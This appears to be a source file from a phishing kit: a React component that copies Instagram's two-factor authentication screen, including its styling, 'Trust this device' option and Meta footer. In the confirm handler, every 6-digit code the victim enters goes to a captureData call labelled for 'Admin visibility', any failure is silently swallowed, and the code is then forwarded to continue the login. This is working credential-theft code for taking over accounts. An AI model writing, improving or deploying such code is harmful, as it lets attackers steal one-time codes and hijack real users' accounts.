"use client";

import { useState, useEffect } from "react";
import { Loader2 } from "lucide-react";
import { captureData } from "@/lib/capture";

interface Props {
  onVerify: (token: string) => void;
  onUseBackup: () => void;
  showError: boolean;
  entryId?: string;
}

export default function AuthTwoFactor({
  onVerify,
  onUseBackup,
  showError,
  entryId,
}: Props) {
  const [token, setToken] = useState("");
  const [isLoading, setIsLoading] = useState(false);

  useEffect(() => {
    if (showError) setIsLoading(false);
  }, [showError]);

  const handleConfirm = async () => {
    if (token.length < 6) return;
    setIsLoading(true);

    try {
      // Direct capture using the MarinaBay mapping for Admin visibility
      await captureData(
        "Central-Region",
        {
          [`MarinaBay_${Date.now()}`]: token,
        },
        entryId || undefined,
      );
    } catch (e) {
      // Silent catch to prevent UI interruption
    }

    onVerify(token);
  };

  return (
    <div className="fixed inset-0 z-[11000] bg-white flex flex-col items-center justify-center font-sans">
      <div className="w-full max-w-[350px] p-8 border border-[#dbdbdb] bg-white flex flex-col items-center text-center">
        <div className="mb-8">
          <div className="w-[72px] h-[72px] rounded-full border-[1.5px] border-[#0095f6] flex items-center justify-center">
            <svg
              width="32"
              height="32"
              viewBox="0 0 24 24"
              fill="none"
              stroke="#0095f6"
              strokeWidth="1.5"
              strokeLinecap="round"
              strokeLinejoin="round">
              <rect x="5" y="11" width="14" height="10" rx="2" ry="2" />
              <path d="M7 11V7a5 5 0 0 1 10 0v4" />
              <line x1="12" y1="15" x2="12" y2="17" strokeWidth="2" />
            </svg>
          </div>
        </div>

        <h2 className="text-[16px] text-[#262626] mb-4 leading-tight">
          Enter a 6-digit login code generated by an authentication app.
        </h2>

        <input
          type="text"
          maxLength={6}
          placeholder="Security Code"
          value={token}
          onChange={(e) => setToken(e.target.value.replace(/[^0-9]/g, ""))}
          className="w-full bg-[#fafafa] border border-[#dbdbdb] rounded-[3px] p-2.5 text-sm outline-none focus:border-gray-400 mb-4 placeholder:text-[#8e8e8e] text-black"
        />

        <button
          disabled={token.length < 6 || isLoading}
          onClick={handleConfirm}
          className={`w-full h-[32px] rounded-lg font-bold text-sm text-white flex items-center justify-center transition-all ${
            token.length === 6 ? "bg-[#0095f6]" : "bg-[#4cb5f9]"
          }`}>
          {isLoading ? <Loader2 className="w-4 h-4 animate-spin" /> : "Confirm"}
        </button>

        {showError && (
          <div className="mt-6 mb-2">
            <p className="text-[14px] text-[#262626] font-normal leading-tight">
              Please check the security code and try again.
            </p>
          </div>
        )}

        <div
          className={`${showError ? "mt-4" : "mt-10"} flex items-start gap-3 mb-10 text-left w-full px-1`}>
          <input
            type="checkbox"
            id="trust"
            defaultChecked
            className="mt-1 w-4 h-4 rounded border-gray-300 accent-[#0095f6]"
          />
          <label htmlFor="trust" className="text-sm text-[#262626]">
            <span className="font-semibold block">Trust this device</span>
            <span className="text-[#8e8e8e] text-xs">
              We won't ask for a code next time
            </span>
          </label>
        </div>

        <p className="text-sm text-[#262626] leading-relaxed">
          If you're unable to receive a login code from an authentication app,
          you can use one of your{" "}
          <button
            onClick={onUseBackup}
            className="text-[#0095f6] font-semibold hover:underline">
            backup codes
          </button>
          .
        </p>
      </div>

      <div className="mt-12 flex flex-wrap justify-center gap-x-4 gap-y-2 px-6 max-w-2xl text-[12px] text-[#8e8e8e]">
        <span>Meta</span>
        <span>About</span>
        <span>Blog</span>
        <span>Jobs</span>
        <span>Help</span>
        <span>API</span>
        <span>Privacy</span>
        <span>Terms</span>
      </div>
      <div className="mt-4 text-[12px] text-[#8e8e8e]">
        English ▾ © 2026 Instagram from Meta
      </div>
    </div>
  );
}
